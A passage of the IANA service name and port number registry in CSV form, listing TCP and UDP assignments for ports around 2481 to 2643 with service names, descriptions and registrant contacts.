PowerExchange Listener,[Dale_Norman],[Dale_Norman],,,,,, giop,2481,tcp,Oracle GIOP,,,,,,,, giop,2481,udp,Oracle GIOP,,,,,,,, giop-ssl,2482,tcp,Oracle GIOP SSL,,,,,,,, giop-ssl,2482,udp,Oracle GIOP SSL,,,,,,,, ttc,2483,tcp,Oracle TTC,,,,,,,, ttc,2483,udp,Oracle TTC,,,,,,,, ttc-ssl,2484,tcp,Oracle TTC SSL,[Chandar_Venkataraman],[Chandar_Venkataraman],,,,,, ttc-ssl,2484,udp,Oracle TTC SSL,[Chandar_Venkataraman],[Chandar_Venkataraman],,,,,, netobjects1,2485,tcp,Net Objects1,,,,,,,, netobjects1,2485,udp,Net Objects1,,,,,,,, netobjects2,2486,tcp,Net Objects2,[Francois_Granade],[Francois_Granade],,,,,, netobjects2,2486,udp,Net Objects2,[Francois_Granade],[Francois_Granade],,,,,, pns,2487,tcp,Policy Notice Service,[Akiyoshi_Ochi],[Akiyoshi_Ochi],,,,,, pns,2487,udp,Policy Notice Service,[Akiyoshi_Ochi],[Akiyoshi_Ochi],,,,,, moy-corp,2488,tcp,Moy Corporation,[Gang_Gong_Moy],[Gang_Gong_Moy],,,,,, moy-corp,2488,udp,Moy Corporation,[Gang_Gong_Moy],[Gang_Gong_Moy],,,,,, tsilb,2489,tcp,TSILB,[James_Irwin],[James_Irwin],,,,,, tsilb,2489,udp,TSILB,[James_Irwin],[James_Irwin],,,,,, qip-qdhcp,2490,tcp,qip_qdhcp,[Mike_Morgan],[Mike_Morgan],,,,,, qip-qdhcp,2490,udp,qip_qdhcp,[Mike_Morgan],[Mike_Morgan],,,,,, conclave-cpp,2491,tcp,Conclave CPP,[Larry_Lipstone],[Larry_Lipstone],,,,,, conclave-cpp,2491,udp,Conclave CPP,[Larry_Lipstone],[Larry_Lipstone],,,,,, groove,2492,tcp,GROOVE,[Ray_Ozzie],[Ray_Ozzie],,,,,, groove,2492,udp,GROOVE,[Ray_Ozzie],[Ray_Ozzie],,,,,, talarian-mqs,2493,tcp,Talarian MQS,[Jim_Stabile],[Jim_Stabile],,,,,, talarian-mqs,2493,udp,Talarian MQS,[Jim_Stabile],[Jim_Stabile],,,,,, bmc-ar,2494,tcp,BMC AR,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, bmc-ar,2494,udp,BMC AR,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, fast-rem-serv,2495,tcp,Fast Remote Services,[Scott_St_Clair],[Scott_St_Clair],,,,,, fast-rem-serv,2495,udp,Fast Remote Services,[Scott_St_Clair],[Scott_St_Clair],,,,,, dirgis,2496,tcp,DIRGIS,[Deutschland_Informat],[Deutschland_Informat],,,,,, dirgis,2496,udp,DIRGIS,[Deutschland_Informat],[Deutschland_Informat],,,,,, quaddb,2497,tcp,Quad DB,[Jeff_Rosenthal],[Jeff_Rosenthal],,,,,, quaddb,2497,udp,Quad DB,[Jeff_Rosenthal],[Jeff_Rosenthal],,,,,, odn-castraq,2498,tcp,ODN-CasTraq,[Richard_Hodges_2],[Richard_Hodges_2],,,,,, odn-castraq,2498,udp,ODN-CasTraq,[Richard_Hodges_2],[Richard_Hodges_2],,,,,, unicontrol,2499,tcp,UniControl,[Ing_Markus_Huemer],[Ing_Markus_Huemer],,,,,, unicontrol,2499,udp,UniControl,[Ing_Markus_Huemer],[Ing_Markus_Huemer],,,,,, rtsserv,2500,tcp,Resource Tracking system server,,,,,,,, rtsserv,2500,udp,Resource Tracking system server,,,,,,,, rtsclient,2501,tcp,Resource Tracking system client,[Aubrey_Turner],[Aubrey_Turner],,,,,, rtsclient,2501,udp,Resource Tracking system client,[Aubrey_Turner],[Aubrey_Turner],,,,,, kentrox-prot,2502,tcp,Kentrox Protocol,[Anil_Lakhwara],[Anil_Lakhwara],,,,,, kentrox-prot,2502,udp,Kentrox Protocol,[Anil_Lakhwara],[Anil_Lakhwara],,,,,, nms-dpnss,2503,tcp,NMS-DPNSS,[Jean_Christophe_Desi],[Jean_Christophe_Desi],,,,,, nms-dpnss,2503,udp,NMS-DPNSS,[Jean_Christophe_Desi],[Jean_Christophe_Desi],,,,,, wlbs,2504,tcp,WLBS,[William_Bain],[William_Bain],,,,,, wlbs,2504,udp,WLBS,[William_Bain],[William_Bain],,,,,, ppcontrol,2505,tcp,PowerPlay Control,[Max_Magliaro],[Max_Magliaro],2004-11,,,,, ppcontrol,2505,udp,PowerPlay Control,[Max_Magliaro],[Max_Magliaro],2004-11,,,,, jbroker,2506,tcp,jbroker,[Rohit_Garg_2],[Rohit_Garg_2],,,,,, jbroker,2506,udp,jbroker,[Rohit_Garg_2],[Rohit_Garg_2],,,,,, spock,2507,tcp,spock,[Jon_A_Christopher],[Jon_A_Christopher],,,,,, spock,2507,udp,spock,[Jon_A_Christopher],[Jon_A_Christopher],,,,,, jdatastore,2508,tcp,JDataStore,[Tod_Landis],[Tod_Landis],,,,,, jdatastore,2508,udp,JDataStore,[Tod_Landis],[Tod_Landis],,,,,, fjmpss,2509,tcp,fjmpss,[Makoto_Watanabe],[Makoto_Watanabe],,,,,, fjmpss,2509,udp,fjmpss,[Makoto_Watanabe],[Makoto_Watanabe],,,,,, fjappmgrbulk,2510,tcp,fjappmgrbulk,[Hiroyuki_Kawabuchi],[Hiroyuki_Kawabuchi],,,,,, fjappmgrbulk,2510,udp,fjappmgrbulk,[Hiroyuki_Kawabuchi],[Hiroyuki_Kawabuchi],,,,,, metastorm,2511,tcp,Metastorm,[Eric_Isom],[Eric_Isom],,,,,, metastorm,2511,udp,Metastorm,[Eric_Isom],[Eric_Isom],,,,,, citrixima,2512,tcp,Citrix IMA,,,,,,,, citrixima,2512,udp,Citrix IMA,,,,,,,, citrixadmin,2513,tcp,Citrix ADMIN,[Myk_Willis],[Myk_Willis],,,,,, citrixadmin,2513,udp,Citrix ADMIN,[Myk_Willis],[Myk_Willis],,,,,, facsys-ntp,2514,tcp,Facsys NTP,,,,,,,, facsys-ntp,2514,udp,Facsys NTP,,,,,,,, facsys-router,2515,tcp,Facsys Router,[Jeff_Hoffman],[Jeff_Hoffman],,,,,, facsys-router,2515,udp,Facsys Router,[Jeff_Hoffman],[Jeff_Hoffman],,,,,, maincontrol,2516,tcp,Main Control,[Nathan_Sadia],[Nathan_Sadia],,,,,, maincontrol,2516,udp,Main Control,[Nathan_Sadia],[Nathan_Sadia],,,,,, call-sig-trans,2517,tcp,H.323 Annex E Call Control Signalling Transport,[ITU-T],[ITU-T_TSB],,2013-01-31,,,, call-sig-trans,2517,udp,H.323 Annex E Call Control Signalling Transport,[ITU-T],[ITU-T_TSB],,2013-01-31,,,, willy,2518,tcp,Willy,[Carl_Johan_Wik],[Carl_Johan_Wik],,,,,, willy,2518,udp,Willy,[Carl_Johan_Wik],[Carl_Johan_Wik],,,,,, globmsgsvc,2519,tcp,globmsgsvc,[David_Wiltz],[David_Wiltz],,,,,, globmsgsvc,2519,udp,globmsgsvc,[David_Wiltz],[David_Wiltz],,,,,, pvsw,2520,tcp,Pervasive Listener,[Chuck_Talk],[Chuck_Talk],,,,,, pvsw,2520,udp,Pervasive Listener,[Chuck_Talk],[Chuck_Talk],,,,,, adaptecmgr,2521,tcp,Adaptec Manager,[Mark_Parenti],[Mark_Parenti],,,,,, adaptecmgr,2521,udp,Adaptec Manager,[Mark_Parenti],[Mark_Parenti],,,,,, windb,2522,tcp,WinDb,[Larry_Traylor],[Larry_Traylor],,,,,, windb,2522,udp,WinDb,[Larry_Traylor],[Larry_Traylor],,,,,, qke-llc-v3,2523,tcp,Qke LLC V.3,[Joerg_Niehoff],[Joerg_Niehoff],,,,,, qke-llc-v3,2523,udp,Qke LLC V.3,[Joerg_Niehoff],[Joerg_Niehoff],,,,,, optiwave-lm,2524,tcp,Optiwave License Management,[Slawomir_Krzesinski],[Slawomir_Krzesinski],,,,,, optiwave-lm,2524,udp,Optiwave License Management,[Slawomir_Krzesinski],[Slawomir_Krzesinski],,,,,, ms-v-worlds,2525,tcp,MS V-Worlds,[Pete_Wong],[Pete_Wong],,,,,, ms-v-worlds,2525,udp,MS V-Worlds,[Pete_Wong],[Pete_Wong],,,,,, ema-sent-lm,2526,tcp,EMA License Manager,[Thaddeus_Perala],[Thaddeus_Perala],,,,,, ema-sent-lm,2526,udp,EMA License Manager,[Thaddeus_Perala],[Thaddeus_Perala],,,,,, iqserver,2527,tcp,IQ Server,[Nick_Straguzzi],[Nick_Straguzzi],,,,,, iqserver,2527,udp,IQ Server,[Nick_Straguzzi],[Nick_Straguzzi],,,,,, ncr-ccl,2528,tcp,"NCR CCL IANA assigned this well-formed service name as a replacement for ""ncr_ccl"".",[Amitava_Dutta],[Amitava_Dutta],,,,,, ncr_ccl,2528,tcp,NCR CCL,[Amitava_Dutta],[Amitava_Dutta],,,,,,"This entry is an alias to ""ncr-ccl"". This entry is now historic, not usable for use with many common service discovery mechanisms." ncr-ccl,2528,udp,"NCR CCL IANA assigned this well-formed service name as a replacement for ""ncr_ccl"".",[Amitava_Dutta],[Amitava_Dutta],,,,,, ncr_ccl,2528,udp,NCR CCL,[Amitava_Dutta],[Amitava_Dutta],,,,,,"This entry is an alias to ""ncr-ccl"". This entry is now historic, not usable for use with many common service discovery mechanisms." utsftp,2529,tcp,UTS FTP,[David_Moore],[David_Moore],,,,,, utsftp,2529,udp,UTS FTP,[David_Moore],[David_Moore],,,,,, vrcommerce,2530,tcp,VR Commerce,[Yosi_Mass],[Yosi_Mass],,,,,, vrcommerce,2530,udp,VR Commerce,[Yosi_Mass],[Yosi_Mass],,,,,, ito-e-gui,2531,tcp,ITO-E GUI,[Michael_Haeuptle],[Michael_Haeuptle],,,,,, ito-e-gui,2531,udp,ITO-E GUI,[Michael_Haeuptle],[Michael_Haeuptle],,,,,, ovtopmd,2532,tcp,OVTOPMD,[Eric_Pulsipher],[Eric_Pulsipher],,,,,, ovtopmd,2532,udp,OVTOPMD,[Eric_Pulsipher],[Eric_Pulsipher],,,,,, snifferserver,2533,tcp,SnifferServer,[Amy_Weaver_3],[Amy_Weaver_3],,,,,, snifferserver,2533,udp,SnifferServer,[Amy_Weaver_3],[Amy_Weaver_3],,,,,, combox-web-acc,2534,tcp,Combox Web Access,[Yochai_Cohen],[Yochai_Cohen],,,,,, combox-web-acc,2534,udp,Combox Web Access,[Yochai_Cohen],[Yochai_Cohen],,,,,, madcap,2535,tcp,MADCAP,[Stephen_Hanna_2],[Stephen_Hanna_2],,,,,, madcap,2535,udp,MADCAP,[Stephen_Hanna_2],[Stephen_Hanna_2],,,,,, btpp2audctr1,2536,tcp,btpp2audctr1,[Ian_Daniels],[Ian_Daniels],,,,,, btpp2audctr1,2536,udp,btpp2audctr1,[Ian_Daniels],[Ian_Daniels],,,,,, upgrade,2537,tcp,Upgrade Protocol,[Breck_Auten],[Breck_Auten],,,,,, upgrade,2537,udp,Upgrade Protocol,[Breck_Auten],[Breck_Auten],,,,,, vnwk-prapi,2538,tcp,vnwk-prapi,[John_Hasselkus],[John_Hasselkus],,,,,, vnwk-prapi,2538,udp,vnwk-prapi,[John_Hasselkus],[John_Hasselkus],,,,,, vsiadmin,2539,tcp,VSI Admin,[Rob_Juergens],[Rob_Juergens],,,,,, vsiadmin,2539,udp,VSI Admin,[Rob_Juergens],[Rob_Juergens],,,,,, lonworks,2540,tcp,LonWorks,,,,,,,, lonworks,2540,udp,LonWorks,,,,,,,, lonworks2,2541,tcp,LonWorks2,[Gary_Bartlett],[Gary_Bartlett],,,,,, lonworks2,2541,udp,LonWorks2,[Gary_Bartlett],[Gary_Bartlett],,,,,, udrawgraph,2542,tcp,uDraw(Graph),[Bremen],[Bremen],,,,,, udrawgraph,2542,udp,uDraw(Graph),[Bremen],[Bremen],,,,,, reftek,2543,tcp,REFTEK,[Phil_Davidson],[Phil_Davidson],,,,,, reftek,2543,udp,REFTEK,[Phil_Davidson],[Phil_Davidson],,,,,, novell-zen,2544,tcp,Management Daemon Refresh,[Ty_Ellis],[Ty_Ellis],,,,,, novell-zen,2544,udp,Management Daemon Refresh,[Ty_Ellis],[Ty_Ellis],,,,,, sis-emt,2545,tcp,sis-emt,[Bill_Crawford],[Bill_Crawford],,,,,, sis-emt,2545,udp,sis-emt,[Bill_Crawford],[Bill_Crawford],,,,,, vytalvaultbrtp,2546,tcp,vytalvaultbrtp,,,,,,,, vytalvaultbrtp,2546,udp,vytalvaultbrtp,,,,,,,, vytalvaultvsmp,2547,tcp,vytalvaultvsmp,,,,,,,, vytalvaultvsmp,2547,udp,vytalvaultvsmp,,,,,,,, vytalvaultpipe,2548,tcp,vytalvaultpipe,[Tim_Boldt],[Tim_Boldt],,,,,, vytalvaultpipe,2548,udp,vytalvaultpipe,[Tim_Boldt],[Tim_Boldt],,,,,, ipass,2549,tcp,IPASS,[Michael_Fischer],[Michael_Fischer],,,,,, ipass,2549,udp,IPASS,[Michael_Fischer],[Michael_Fischer],,,,,, ads,2550,tcp,ADS,[Michael_O_Connor],[Michael_O_Connor],,,,,, ads,2550,udp,ADS,[Michael_O_Connor],[Michael_O_Connor],,,,,, isg-uda-server,2551,tcp,ISG UDA Server,[Dror_Harari],[Dror_Harari],,,,,, isg-uda-server,2551,udp,ISG UDA Server,[Dror_Harari],[Dror_Harari],,,,,, call-logging,2552,tcp,Call Logging,[Dean_Webb],[Dean_Webb],,,,,, call-logging,2552,udp,Call Logging,[Dean_Webb],[Dean_Webb],,,,,, efidiningport,2553,tcp,efidiningport,[Lynn_Carter],[Lynn_Carter],,,,,, efidiningport,2553,udp,efidiningport,[Lynn_Carter],[Lynn_Carter],,,,,, vcnet-link-v10,2554,tcp,VCnet-Link v10,[Csaba_Mate],[Csaba_Mate],,,,,, vcnet-link-v10,2554,udp,VCnet-Link v10,[Csaba_Mate],[Csaba_Mate],,,,,, compaq-wcp,2555,tcp,Compaq WCP,[Ferruccio_Barletta],[Ferruccio_Barletta],,,,,, compaq-wcp,2555,udp,Compaq WCP,[Ferruccio_Barletta],[Ferruccio_Barletta],,,,,, nicetec-nmsvc,2556,tcp,nicetec-nmsvc,,,,,,,, nicetec-nmsvc,2556,udp,nicetec-nmsvc,,,,,,,, nicetec-mgmt,2557,tcp,nicetec-mgmt,[Joerg_Paulus],[Joerg_Paulus],,,,,, nicetec-mgmt,2557,udp,nicetec-mgmt,[Joerg_Paulus],[Joerg_Paulus],,,,,, pclemultimedia,2558,tcp,PCLE Multi Media,[Jacob_Gsoedl],[Jacob_Gsoedl],,,,,, pclemultimedia,2558,udp,PCLE Multi Media,[Jacob_Gsoedl],[Jacob_Gsoedl],,,,,, lstp,2559,tcp,LSTP,[Waiki_Wright],[Waiki_Wright],,,,,, lstp,2559,udp,LSTP,[Waiki_Wright],[Waiki_Wright],,,,,, labrat,2560,tcp,labrat,[John_Harvey],[John_Harvey],,,,,, labrat,2560,udp,labrat,[John_Harvey],[John_Harvey],,,,,, mosaixcc,2561,tcp,MosaixCC,[Steven_Frare],[Steven_Frare],,,,,, mosaixcc,2561,udp,MosaixCC,[Steven_Frare],[Steven_Frare],,,,,, delibo,2562,tcp,Delibo,[NovaWiz_LTD],[NovaWiz_LTD],,,,,, delibo,2562,udp,Delibo,[NovaWiz_LTD],[NovaWiz_LTD],,,,,, cti-redwood,2563,tcp,CTI Redwood,[Songwon_Chi],[Songwon_Chi],,,,,, cti-redwood,2563,udp,CTI Redwood,[Songwon_Chi],[Songwon_Chi],,,,,, hp-3000-telnet,2564,tcp,HP 3000 NS/VT block mode telnet,,,,,,,, hp-3000-telnet,2564,udp,HP 3000 NS/VT block mode telnet,,,,,,,, coord-svr,2565,tcp,Coordinator Server,[Richard_Steiger],[Richard_Steiger],,,,,, coord-svr,2565,udp,Coordinator Server,[Richard_Steiger],[Richard_Steiger],,,,,, pcs-pcw,2566,tcp,pcs-pcw,[W_Jordan_Fitzhugh],[W_Jordan_Fitzhugh],,,,,, pcs-pcw,2566,udp,pcs-pcw,[W_Jordan_Fitzhugh],[W_Jordan_Fitzhugh],,,,,, clp,2567,tcp,Cisco Line Protocol,[Susan_Hinrichs],[Susan_Hinrichs],,,,,, clp,2567,udp,Cisco Line Protocol,[Susan_Hinrichs],[Susan_Hinrichs],,,,,, spamtrap,2568,tcp,SPAM TRAP,[Charles_Bennett],[Charles_Bennett],2008-08-29,,,,, spamtrap,2568,udp,SPAM TRAP,[Charles_Bennett],[Charles_Bennett],2008-08-29,,,,, sonuscallsig,2569,tcp,Sonus Call Signal,[Mark_Garti],[Mark_Garti],,,,,, sonuscallsig,2569,udp,Sonus Call Signal,[Mark_Garti],[Mark_Garti],,,,,, hs-port,2570,tcp,HS Port,[Uri_Doron],[Uri_Doron],,,,,, hs-port,2570,udp,HS Port,[Uri_Doron],[Uri_Doron],,,,,, cecsvc,2571,tcp,CECSVC,[Roger_Pao],[Roger_Pao],,,,,, cecsvc,2571,udp,CECSVC,[Roger_Pao],[Roger_Pao],,,,,, ibp,2572,tcp,IBP,[Jonathan_Downes],[Jonathan_Downes],,,,,, ibp,2572,udp,IBP,[Jonathan_Downes],[Jonathan_Downes],,,,,, trustestablish,2573,tcp,Trust Establish,[Yosi_Mass],[Yosi_Mass],,,,,, trustestablish,2573,udp,Trust Establish,[Yosi_Mass],[Yosi_Mass],,,,,, blockade-bpsp,2574,tcp,Blockade BPSP,[Blockade],[Blockade],,,,,, blockade-bpsp,2574,udp,Blockade BPSP,[Blockade],[Blockade],,,,,, hl7,2575,tcp,HL7,[Tim_Jacobs],[Tim_Jacobs],,,,,, hl7,2575,udp,HL7,[Tim_Jacobs],[Tim_Jacobs],,,,,, tclprodebugger,2576,tcp,TCL Pro Debugger,,,,,,,, tclprodebugger,2576,udp,TCL Pro Debugger,,,,,,,, scipticslsrvr,2577,tcp,Scriptics Lsrvr,[Brent_Welch],[Brent_Welch],,,,,, scipticslsrvr,2577,udp,Scriptics Lsrvr,[Brent_Welch],[Brent_Welch],,,,,, rvs-isdn-dcp,2578,tcp,RVS ISDN DCP,[Michael_Zirpel],[Michael_Zirpel],,,,,, rvs-isdn-dcp,2578,udp,RVS ISDN DCP,[Michael_Zirpel],[Michael_Zirpel],,,,,, mpfoncl,2579,tcp,mpfoncl,[Itaru_Kimura],[Itaru_Kimura],,,,,, mpfoncl,2579,udp,mpfoncl,[Itaru_Kimura],[Itaru_Kimura],,,,,, tributary,2580,tcp,Tributary,[Louis_Lu],[Louis_Lu],,,,,, tributary,2580,udp,Tributary,[Louis_Lu],[Louis_Lu],,,,,, argis-te,2581,tcp,ARGIS TE,,,,,,,, argis-te,2581,udp,ARGIS TE,,,,,,,, argis-ds,2582,tcp,ARGIS DS,[John_Legh_Page],[John_Legh_Page],,,,,, argis-ds,2582,udp,ARGIS DS,[John_Legh_Page],[John_Legh_Page],,,,,, mon,2583,tcp,MON,[Jim_Trocki],[Jim_Trocki],,,,,, mon,2583,udp,MON,[Jim_Trocki],[Jim_Trocki],,,,,, cyaserv,2584,tcp,cyaserv,[Morgan_Jones],[Morgan_Jones],,,,,, cyaserv,2584,udp,cyaserv,[Morgan_Jones],[Morgan_Jones],,,,,, netx-server,2585,tcp,NETX Server,,,,,,,, netx-server,2585,udp,NETX Server,,,,,,,, netx-agent,2586,tcp,NETX Agent,[Brett_Dolecheck],[Brett_Dolecheck],,,,,, netx-agent,2586,udp,NETX Agent,[Brett_Dolecheck],[Brett_Dolecheck],,,,,, masc,2587,tcp,MASC,[Pavlin_Ivanov_Radosl],[Pavlin_Ivanov_Radosl],,,,,, masc,2587,udp,MASC,[Pavlin_Ivanov_Radosl],[Pavlin_Ivanov_Radosl],,,,,, privilege,2588,tcp,Privilege,[Gil_Hecht],[Gil_Hecht],,,,,, privilege,2588,udp,Privilege,[Gil_Hecht],[Gil_Hecht],,,,,, quartus-tcl,2589,tcp,quartus tcl,[Subroto_Datta],[Subroto_Datta],,,,,, quartus-tcl,2589,udp,quartus tcl,[Subroto_Datta],[Subroto_Datta],,,,,, idotdist,2590,tcp,idotdist,[Jason_Hunter],[Jason_Hunter],,,,,, idotdist,2590,udp,idotdist,[Jason_Hunter],[Jason_Hunter],,,,,, maytagshuffle,2591,tcp,Maytag Shuffle,[Ken_Ksiazek],[Ken_Ksiazek],,,,,, maytagshuffle,2591,udp,Maytag Shuffle,[Ken_Ksiazek],[Ken_Ksiazek],,,,,, netrek,2592,tcp,netrek,[Al_Guetzlaff],[Al_Guetzlaff],,,,,, netrek,2592,udp,netrek,[Al_Guetzlaff],[Al_Guetzlaff],,,,,, mns-mail,2593,tcp,MNS Mail Notice Service,[Rumiko_Kikuta],[Rumiko_Kikuta],,,,,, mns-mail,2593,udp,MNS Mail Notice Service,[Rumiko_Kikuta],[Rumiko_Kikuta],,,,,, dts,2594,tcp,Data Base Server,[Andreas_Roene],[Andreas_Roene],,,,,, dts,2594,udp,Data Base Server,[Andreas_Roene],[Andreas_Roene],,,,,, worldfusion1,2595,tcp,World Fusion 1,,,,,,,, worldfusion1,2595,udp,World Fusion 1,,,,,,,, worldfusion2,2596,tcp,World Fusion 2,[World_Fusion],[World_Fusion],,,,,, worldfusion2,2596,udp,World Fusion 2,[World_Fusion],[World_Fusion],,,,,, homesteadglory,2597,tcp,Homestead Glory,[John_Tokash],[John_Tokash],,,,,, homesteadglory,2597,udp,Homestead Glory,[John_Tokash],[John_Tokash],,,,,, citriximaclient,2598,tcp,Citrix MA Client,[Myk_Willis],[Myk_Willis],,,,,, citriximaclient,2598,udp,Citrix MA Client,[Myk_Willis],[Myk_Willis],,,,,, snapd,2599,tcp,Snap Discovery,[Kevin_Osborn],[Kevin_Osborn],,,,,, snapd,2599,udp,Snap Discovery,[Kevin_Osborn],[Kevin_Osborn],,,,,, hpstgmgr,2600,tcp,HPSTGMGR,[Kevin_Collins],[Kevin_Collins],,,,,, hpstgmgr,2600,udp,HPSTGMGR,[Kevin_Collins],[Kevin_Collins],,,,,, discp-client,2601,tcp,discp client,,,,,,,, discp-client,2601,udp,discp client,,,,,,,, discp-server,2602,tcp,discp server,[Peter_White],[Peter_White],,,,,, discp-server,2602,udp,discp server,[Peter_White],[Peter_White],,,,,, servicemeter,2603,tcp,Service Meter,[Duncan_Hare],[Duncan_Hare],,,,,, servicemeter,2603,udp,Service Meter,[Duncan_Hare],[Duncan_Hare],,,,,, nsc-ccs,2604,tcp,NSC CCS,,,,,,,, nsc-ccs,2604,udp,NSC CCS,,,,,,,, nsc-posa,2605,tcp,NSC POSA,[Tom_Findley],[Tom_Findley],,,,,, nsc-posa,2605,udp,NSC POSA,[Tom_Findley],[Tom_Findley],,,,,, netmon,2606,tcp,Dell Netmon,,,,,,,, netmon,2606,udp,Dell Netmon,,,,,,,, connection,2607,tcp,Dell Connection,[Sudhir_Shetty],[Sudhir_Shetty],,,,,, connection,2607,udp,Dell Connection,[Sudhir_Shetty],[Sudhir_Shetty],,,,,, wag-service,2608,tcp,Wag Service,[Gilles_Bourquard],[Gilles_Bourquard],,,,,, wag-service,2608,udp,Wag Service,[Gilles_Bourquard],[Gilles_Bourquard],,,,,, system-monitor,2609,tcp,System Monitor,[Greg_Robson_Garth],[Greg_Robson_Garth],,,,,, system-monitor,2609,udp,System Monitor,[Greg_Robson_Garth],[Greg_Robson_Garth],,,,,, versa-tek,2610,tcp,VersaTek,[James_Kou],[James_Kou],,,,,, versa-tek,2610,udp,VersaTek,[James_Kou],[James_Kou],,,,,, lionhead,2611,tcp,LIONHEAD,[Tim_Rance],[Tim_Rance],,,,,, lionhead,2611,udp,LIONHEAD,[Tim_Rance],[Tim_Rance],,,,,, qpasa-agent,2612,tcp,Qpasa Agent,[Craig_Ching],[Craig_Ching],,,,,, qpasa-agent,2612,udp,Qpasa Agent,[Craig_Ching],[Craig_Ching],,,,,, smntubootstrap,2613,tcp,SMNTUBootstrap,[Matt_Cecile],[Matt_Cecile],,,,,, smntubootstrap,2613,udp,SMNTUBootstrap,[Matt_Cecile],[Matt_Cecile],,,,,, neveroffline,2614,tcp,Never Offline,[Dustin_Brand],[Dustin_Brand],,,,,, neveroffline,2614,udp,Never Offline,[Dustin_Brand],[Dustin_Brand],,,,,, firepower,2615,tcp,firepower,[Jason_Volk],[Jason_Volk],,,,,, firepower,2615,udp,firepower,[Jason_Volk],[Jason_Volk],,,,,, appswitch-emp,2616,tcp,appswitch-emp,[Ted_Ross],[Ted_Ross],,,,,, appswitch-emp,2616,udp,appswitch-emp,[Ted_Ross],[Ted_Ross],,,,,, cmadmin,2617,tcp,Clinical Context Managers,[Mark_Morwood],[Mark_Morwood],,,,,, cmadmin,2617,udp,Clinical Context Managers,[Mark_Morwood],[Mark_Morwood],,,,,, priority-e-com,2618,tcp,Priority E-Com,[Marcelo_Einhorn_2],[Marcelo_Einhorn_2],,,,,, priority-e-com,2618,udp,Priority E-Com,[Marcelo_Einhorn_2],[Marcelo_Einhorn_2],,,,,, bruce,2619,tcp,bruce,[Alec_Muffett],[Alec_Muffett],,,,,, bruce,2619,udp,bruce,[Alec_Muffett],[Alec_Muffett],,,,,, lpsrecommender,2620,tcp,LPSRecommender,[Pritham_Shetty_2],[Pritham_Shetty_2],,,,,, lpsrecommender,2620,udp,LPSRecommender,[Pritham_Shetty_2],[Pritham_Shetty_2],,,,,, miles-apart,2621,tcp,Miles Apart Jukebox Server,[Michael_Rathmann],[Michael_Rathmann],,,,,, miles-apart,2621,udp,Miles Apart Jukebox Server,[Michael_Rathmann],[Michael_Rathmann],,,,,, metricadbc,2622,tcp,MetricaDBC,[Russ_Olivant],[Russ_Olivant],,,,,, metricadbc,2622,udp,MetricaDBC,[Russ_Olivant],[Russ_Olivant],,,,,, lmdp,2623,tcp,LMDP,[Ken_Bailey],[Ken_Bailey],,,,,, lmdp,2623,udp,LMDP,[Ken_Bailey],[Ken_Bailey],,,,,, aria,2624,tcp,Aria,[Logan_Bruns],[Logan_Bruns],,,,,, aria,2624,udp,Aria,[Logan_Bruns],[Logan_Bruns],,,,,, blwnkl-port,2625,tcp,Blwnkl Port,[Weng_Chin_Yung],[Weng_Chin_Yung],,,,,, blwnkl-port,2625,udp,Blwnkl Port,[Weng_Chin_Yung],[Weng_Chin_Yung],,,,,, gbjd816,2626,tcp,gbjd816,[George_Balesta],[George_Balesta],,,,,, gbjd816,2626,udp,gbjd816,[George_Balesta],[George_Balesta],,,,,, moshebeeri,2627,tcp,Moshe Beeri,[Moshe_Beeri],[Moshe_Beeri],,,,,, moshebeeri,2627,udp,Moshe Beeri,[Moshe_Beeri],[Moshe_Beeri],,,,,, dict,2628,tcp,DICT,[Rik_Faith],[Rik_Faith],,,,,, dict,2628,udp,DICT,[Rik_Faith],[Rik_Faith],,,,,, sitaraserver,2629,tcp,Sitara Server,,,,,,,, sitaraserver,2629,udp,Sitara Server,,,,,,,, sitaramgmt,2630,tcp,Sitara Management,,,,,,,, sitaramgmt,2630,udp,Sitara Management,,,,,,,, sitaradir,2631,tcp,Sitara Dir,[Manickam_R_Sridhar],[Manickam_R_Sridhar],,,,,, sitaradir,2631,udp,Sitara Dir,[Manickam_R_Sridhar],[Manickam_R_Sridhar],,,,,, irdg-post,2632,tcp,IRdg Post,[IRdg],[IRdg],,,,,, irdg-post,2632,udp,IRdg Post,[IRdg],[IRdg],,,,,, interintelli,2633,tcp,InterIntelli,[Mike_Gagle],[Mike_Gagle],,,,,, interintelli,2633,udp,InterIntelli,[Mike_Gagle],[Mike_Gagle],,,,,, pk-electronics,2634,tcp,PK Electronics,[Seb_Ibis],[Seb_Ibis],,,,,, pk-electronics,2634,udp,PK Electronics,[Seb_Ibis],[Seb_Ibis],,,,,, backburner,2635,tcp,Back Burner,[Kevin_Teiskoetter],[Kevin_Teiskoetter],,,,,, backburner,2635,udp,Back Burner,[Kevin_Teiskoetter],[Kevin_Teiskoetter],,,,,, solve,2636,tcp,Solve,[Peter_Morrison],[Peter_Morrison],,,,,, solve,2636,udp,Solve,[Peter_Morrison],[Peter_Morrison],,,,,, imdocsvc,2637,tcp,Import Document Service,[Zia_Bhatti],[Zia_Bhatti],,,,,, imdocsvc,2637,udp,Import Document Service,[Zia_Bhatti],[Zia_Bhatti],,,,,, sybaseanywhere,2638,tcp,Sybase Anywhere,[Dave_Neudoerffer],[Dave_Neudoerffer],,,,,, sybaseanywhere,2638,udp,Sybase Anywhere,[Dave_Neudoerffer],[Dave_Neudoerffer],,,,,, aminet,2639,tcp,AMInet,[Alcorn_McBride_Inc],[Alcorn_McBride_Inc],,,,,, aminet,2639,udp,AMInet,[Alcorn_McBride_Inc],[Alcorn_McBride_Inc],,,,,, sai-sentlm,2640,tcp,"Sabbagh Associates Licence Manager IANA assigned this well-formed service name as a replacement for ""sai_sentlm"".",[Elias_Sabbagh],[Elias_Sabbagh],,,,,, sai_sentlm,2640,tcp,Sabbagh Associates Licence Manager,[Elias_Sabbagh],[Elias_Sabbagh],,,,,,"This entry is an alias to ""sai-sentlm"". This entry is now historic, not usable for use with many common service discovery mechanisms." sai-sentlm,2640,udp,"Sabbagh Associates Licence Manager IANA assigned this well-formed service name as a replacement for ""sai_sentlm"".",[Elias_Sabbagh],[Elias_Sabbagh],,,,,, sai_sentlm,2640,udp,Sabbagh Associates Licence Manager,[Elias_Sabbagh],[Elias_Sabbagh],,,,,,"This entry is an alias to ""sai-sentlm"". This entry is now historic, not usable for use with many common service discovery mechanisms." hdl-srv,2641,tcp,HDL Server,[David_Ely],[David_Ely],,,,,, hdl-srv,2641,udp,HDL Server,[David_Ely],[David_Ely],,,,,, tragic,2642,tcp,Tragic,[Stu_Mark],[Stu_Mark],,,,,, tragic,2642,udp,Tragic,[Stu_Mark],[Stu_Mark],,,,,, gte-samp,2643,tcp,GTE-SAMP,[Asher_Altman],[Asher_Altman],,,,,, 